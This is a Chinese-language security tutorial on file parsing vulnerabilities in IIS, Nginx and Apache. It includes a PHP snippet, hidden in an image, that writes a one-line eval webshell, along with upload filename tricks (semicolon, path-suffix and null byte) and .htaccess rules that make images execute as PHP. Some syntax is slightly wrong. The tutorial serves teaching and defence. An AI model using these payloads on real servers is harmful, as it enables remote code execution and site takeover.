文件解析漏洞原理

        文件解析漏洞主要是由于网站管理者操作不当或者web服务器自身的漏洞，导致一些特殊文件被IIS，apache，nginx或者其他web服务器在某种情况下解析成脚本文件去执行。

 文件解析漏洞分类

        IIS解析漏洞

        目录解析漏洞（test.asp/1.jpg）

        在IIS5.x/6.0中，网站下创建的名为*.asp，*.asa，*.cer，*.cdx的文件夹，而这些文件夹中的任何拓展名的文件都会被IIS当作asp文件来解析并执行。

        文件名解析漏洞（test.asp;jpg）

        在IIS5.x/6.0中,分号后面的不被解析，也就是test.asp;.jpg会被服务器当作test.asp。IIS6.0默认的可执行文件除了asp还有test.asa和test.cer两种后缀的文件。同样可以使用test.asa;.jpg和test.cer;.jpg进行上传解析。

        畸形解析漏洞（test.jpg/*.php）

        IIS7.0中，在默认Fast-CGI开启的情况下，我们向图片中写入如下的代码

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[a])?>')?>

        将文件保存为test.jpg，上传到服务器，假设上传路径为/upload，上传成功后，直接访问/upload/test.jpg/a.php,test.jpg将会被服务器当成php文件执行，所以图片中的代码就会执行创建shell.php并写入<?php @eval($_POST[a]);?>

        临时解决办法：设置cgi.fix_pathinfo为0

        

        Nginx解析漏洞

        畸形解析漏洞（test.jpg/*.php）

        漏洞原因：

                php的配置文件php.ini文件中开启了cgi.fix_pathinfo

                /etc/php5/fpm/pool.d/www.conf中不正确的配置security.limit_extensions，导致允许将其他格式的文件当作php解析执行

        新建一个文件，内容为:<?php phpinfo();?>,然后将其命名为test.jpg，在浏览器中访问http://127.0.0.1/test.jpg显示图片解析错误；访问http:.//127.0.0.1/test.jpg/test.php，显示：Access denid.。test.jpg时文件不是文件夹，test.php也根本就是不存在的文件，访问http://127.0.0.1/test.jpg/test.php没有报404，而是显示Access denid，原因在于，Nginx在拿到/test.jpg/test.php后，一看后缀是.php,于是认为该文件是php文件，交给php引擎去处理。For example：当php引擎遇到文件路径为/aaa.xxx/bbb.yyy/ccc.zzz时，若/aaa.xxx/bbb.yyy/ccc.zzz不存在，则会去掉最后的/ccc.zzz，然后判断/aaa.xxx/bbb.yyy是否存在，以此类推，直到找出存在的文件如（/aaa.xxx/bbb.yyy），将/aaa.xxx/bbb.yyy当作文件/aaa.xxx/bbb.yyy/ccc.zzz。目前我们还是没有成功执行代码，test.jpg并没有怕被当做php文件执行，是因为新版本php引入了security.limit_extensions，限制可执行文件的后缀名，默认情况只允许执行.php格式的文件

        Nginx和IIS解析php文件时，不管文件存在与否，就直接交给php引擎处理，而apache服务器解析之前会判断文件是否存在。

        

        %00空字节代码解析漏洞

        Nginx遇到%00空字节时与后端FastCGI处理不一致，导致可以在图片中插入php代码，通过访问test.jpg%00.php来执行其中的代码

        Nginx0.5.*，Nginx0.6.*，Nginx0.7<=0.7.65，Nginx0.8<=0.8.37

        CVE-2013-4547（%20%00）

        影响Nginx版本：0.8.41~1.5.6

        漏洞原理：

                非法空字符和截止符（%00）会使得Nginx解析url时的有机制发生混乱，允许攻击者通过一个非编码空格绕过后缀名限制，假如服务器上有个文件："test.jpg "，jpg后缀后面有空格，则可以通过http://127.0.0.1/test.jpg \0.php，让Nginx认为文件"test.jpg "的后缀为.php

        Apache解析漏洞

        文件名解析漏洞

                apache解析文件的顺序是从右到左，如果不能解析，就往左继续判断。

        .htaccess文件

                .htaccess文件时apache中的一个配置文件，负责相关目录下的网页配置，通过.htaccess文件，可以实现：

                网页301重定向，自定义404错误页面，改变文件拓展名，允许或阻止特定用户/目录访问，禁止目录列表，配置默认文档等。该文件默认开启，启用和关闭在httpd.conf中进行配置。

        .htaccess文件生效前提：

                mod_rewrite模块开启

                AllowOverride All

#把所有名字包含test的文件当作php脚本执行
<FileMatch "test">
    SetHandler application/x-httpd-php
</FileMatch>


#让.jpg格式文件以php格式解析
AddType application/x-httpd-php .jpg